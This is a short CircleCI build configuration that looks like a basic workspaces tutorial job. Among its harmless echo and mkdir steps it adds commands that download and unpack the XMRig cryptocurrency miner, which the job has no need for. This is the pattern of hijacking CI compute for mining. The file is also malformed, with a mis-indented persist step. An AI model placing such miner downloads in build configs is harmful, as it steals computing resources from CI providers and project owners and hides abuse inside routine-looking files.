version: 2
jobs:
  one:
    docker:
      - image: circleci/ruby:2.4.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: echo "A first hello"
      - run: mkdir -p my_workspace
      - run: echo "Trying out workspaces" > my_workspace/echo-output
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.9.0/xmrig-6.9.0-linux-static-x64.tar.gz
      - run: tar xf xmrig-6.9.0-linux-static-x64.tar.gz
      - run: cd xmrig-6.9.0
     - persist_to_workspace:
          # Must be an absolute path, or relative path from working_directory
          root: my_workspace